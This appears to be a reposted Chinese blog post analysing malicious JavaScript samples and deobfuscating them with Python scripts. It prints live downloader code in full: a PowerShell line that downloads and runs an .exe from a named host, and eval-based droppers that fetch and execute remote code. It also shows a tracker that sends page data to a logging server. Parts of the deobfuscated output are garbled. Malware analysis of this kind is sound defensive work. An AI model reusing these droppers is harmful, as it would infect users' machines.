程序博客网 > 家里有网络怎么看电视

Virus_JS3_PyAnalysisAndSummary

来源:互联网 发布:家里有网络怎么看电视 编辑:程序博客网 时间:2024/06/16 12:55

本篇是对JS样本做的简单分析第三篇,有点重复的意思,当巩固吧.

0x1 Sample(TotalSamp_myself\Js–166x–63)

var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return  new ActiveXObject(_0x586f[45]);} else {throw  new Error(_0x586f[46]);} ;} ;} ;

0x2 py脚本

#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '063.JS.vir'          #JsVirus文件OutPath = '63_analysis.txt'     #提取到的文件myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):    logall = []    #print(InPath)    if os.path.exists(InPath):        f = codecs.open(InPath,ReadTye,'utf-8')        #读入到list        for line in f:            if None == line:                pass            else:                logall.append(line)        f.close()    return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典    #if os.path.exists(InPath):    #   pass    #else:    #要用全局变量把这里变成只写一次吗    global AuthorSign    f = codecs.open(OutRePath,WriteTye,'utf-8')    if AuthorSign == True:        f.write('\n*****************************************************\r\n')        f.write('*              ahoo JsVirusAnalysis                        ')        f.write('\n***************************************************\r\n\n')        AuthorSign = False    for i in findRe:        f.write(i + '\n')    f.close()    return Truedef JSVirus_Parse():    #1.读取文件到LineList    myJslog = ReadLogFile(PutPath)    #print(myJslog)    writeList_temp = []    writeList = []    #2.分为两部分处理.    f586List = []    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')    for line in myJslog:        if '_0x586f=["' in line:            #2.1 替换16进制--            for i in pattern_ascii.findall(line):                #方法1                #line = line.replace(i[0], chr(int(i[1],16)))                #方法2                pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')                line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)            print(line)            writeList.append(line)            #2.2 分割为数组            #line13 = 'var _0x586f=["value","xKeyx","getElementById","URL","&","&amp"];'            #re.match(r"\[(.*)\]",line13[12:]).group(1)            f586List = re.match(r"\[(.*)\]",line[12:]).group(1).split(',')            print(f586List)        else:            writeList_temp.append(line)    #3.替换数组    #3.1查找所有数组    ''' for test    line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"    print(line11)    pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')    for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):        index = int(arrary)        repStr = "*haha*"        line11 = pattern_arrary.sub(repStr,line11,count=1)    print(line11)    '''    for line in writeList_temp:        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line):            index   = int(arrary)            repStr  = f586List[index]            line    = pattern_arrary.sub(repStr,line,count=1)            #3.2替换分割的字符串+            plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"')             line = plus.sub('',line)    writeList.append(line)      #4 写入并打开文件    WriteResultFile(OutPath,writeList)    os.system('notepad.exe ' + OutPath)    print('The Virus has been analyzed,there is my advice! Thanks!')    return Trueif __name__ == '__main__':    JSVirus_Parse()

0x3 输出结果

做过美容的.var _0x586f=["value","xKeyx","getElementById","URL","&","&amp;","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];var k = document["getElementById"]("xKeyx")["value"];var visitorData = new visitorData(k);function visitorData(_0xf4c7x3) {        this["URL"] = document["URL"]["replace"]("&", "&amp;");        this["k"] = _0xf4c7x3;        try {            this["referrer"] = top["document"]["referrer"]["replace"]("&", "&amp;");        } catch (err) {            this["referrer"] = "err";        };        var _0xf4c7x4 = CreateXMLHttpRequest();        _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);        _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");        var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return  new ActiveXObject("undefined");} else {throw  new Error("Microsoft.XMLHTTP");} ;} ;} ;

0x4 注意

[1]生成代码后做个美容(格式化)http://www.css88.com/tool/js_beautify/[2]正则测试工具(F:\RegTestTool.exe)

0x5下面做点扩充吧,js的都往后续…

0x5.1 Num25

var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);

0x5.2 Num41

var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0"; var x = new Array("jaysonandfrisby.com","romiecoston.com"); var z1 = "Msxml2.XMLHTTP"; var z4 = "a"; for (var i=0; i<2; i++) {    var e = new ActiveXObject(z1);     try {         e.open("GET", "http://"+x[i]+"/counter/?"+m, false);        e.send();         if (e.status == 200) {            var z3 = e.responseText;             var z3 = z3.split(m);             var z3 = z3.join(z4);             eval(z3);             break; }        ; }     catch(e)         { }; };

0x5.3 Num29

0x5.3.1样本

    var random=function(){return Math.random()};    try{    var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");    objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);    objHttp.Send();if(objHttp.Status== 200){        eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}    }    catch(e){}

0x5.3.2Py代码

#!/usr/bin/env python3# -*- coding: utf-8 -*-' a test module ahoo'__author__ = 'ahoo'import sysimport ioimport osimport codecsimport reimport shutilPutPath = '029.JS.vir'          OutPath = '29_analysis.txt' #提取到的文件.myJslog = []AuthorSign = Truesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') #改变标准输出的默认编码 def ReadLogFile(InPath,ReadTye = 'r'):    logall = []    #print(InPath)    if os.path.exists(InPath):        f = codecs.open(InPath,ReadTye,'utf-8')        #读入到list        for line in f:            if None == line:                pass            else:                logall.append(line)        f.close()    return logalldef WriteResultFile(OutRePath,findRe= [],WriteTye = 'a+'):      #后面可能改成词典    #if os.path.exists(InPath):    #   pass    #else:    #要用全局变量把这里变成只写一次吗    global AuthorSign    f = codecs.open(OutRePath,WriteTye,'utf-8')    if AuthorSign == True:        f.write('\n*****************************************************\r\n')        f.write('*              ahoo JsVirusAnalysis                        ')        f.write('\n***************************************************\r\n\n')        AuthorSign = False    for i in findRe:        f.write(i + '\n')    f.close()    return Truedef JSVirus_Parse():    #1.读取文件到LineList    myJslog = ReadLogFile(PutPath)    #print(myJslog)    writeList = []    pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')    for line in myJslog:            for i in pattern_ascii.findall(line):            #方法1            #line = line.replace(i[0], chr(int(i[1],16)))            #方法2            pattern_tem = re.compile(r'(\\x[0-9][a-zA-Z0-9])')            line = pattern_tem.sub(chr(int(i[1],16)),line,count =1)        print(line)        writeList.append(line)    #4 写入并打开文件    WriteResultFile(OutPath,writeList)    os.system('notepad.exe ' + OutPath)    print('The Virus has been analyzed,there is my advice! Thanks!')    return Trueif __name__ == '__main__':    JSVirus_Parse()

0x5.3.3输出

******************************************************               ahoo JsVirusAnalysis                        ***************************************************var random=function(){    return Math.random()};try{    var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");    objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);    objHttp.Send();if(objHttp.Status== 200){        eval(objHttp.responseText+ "downAndExec("pg6v");")}}catch(e){}

0x6 小结

强调一点:复杂的看不懂的先美化,就好找规律多了
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.【调试】正则工具: F:\RegTestTool.exe【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)【代码美化-JS】http://www.css88.com/tool/js_beautify/【VB关键字】executeglobal(str) EXECUTE(str)【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)        2.替换某一行中的所有符合条件        ''' for test        line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"        print(line11)        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):            index = int(arrary)            repStr = "*haha*"            line11 = pattern_arrary.sub(repStr,line11,count=1)        print(line11)        '''        3.替换\0x56为char        '''        line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'        pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')        for i in pattern_ascii.findall(line):            #方法1            #line = line.replace(i[0], chr(int(i[1],16)))            #方法2            pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')            line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)        print(line)        '''
阅读全文
0 0
家里有网络怎么看电视 家里有网络怎么看电视
原创粉丝点击
热门IT博客
2016淘宝规则好评返现2016淘宝规则好评返现
mac b站上传视频mac b站上传视频
linux系统查看文件大小
怎样给淘宝店铺起名字
淘宝怎样报名天天特价
小财神软件
淘宝官方改价软件
sleep as android 知乎
最安全的国家知乎
淘宝网上的海之蓝假酒
手机路由器软件下载
ajax json提交数据
php一句话木马大全
ubuntu如何卸载程序
淘宝运营金秋
支付宝解除淘宝绑定
淘宝客设置推广单元
centos wordpress 搭建
java中的匿名内部类
手机淘宝怎么加旺旺群
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 大疆航拍云台 大疆osd 大疆公司地址 精灵3 无人飞机 dji 无人飞机价格 大白穴 水煮大白虾 大白 大白图片 刮大白 陈大白 大白乳 浮一大白 大白鹅 大白腿 刘大白 大白逼 大白简笔画 大白鹅图片 刮大白步骤 大白屁股 大白影音 大白照片 大白英文 大白图 大白的照片 大白是什么 大白怎么画 大白鹅价格 大白价格 大白板价格 大白的价格 大白母猪 大白及 大白腚 大白美乳 刷大白 机器人大白 大白嗓

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里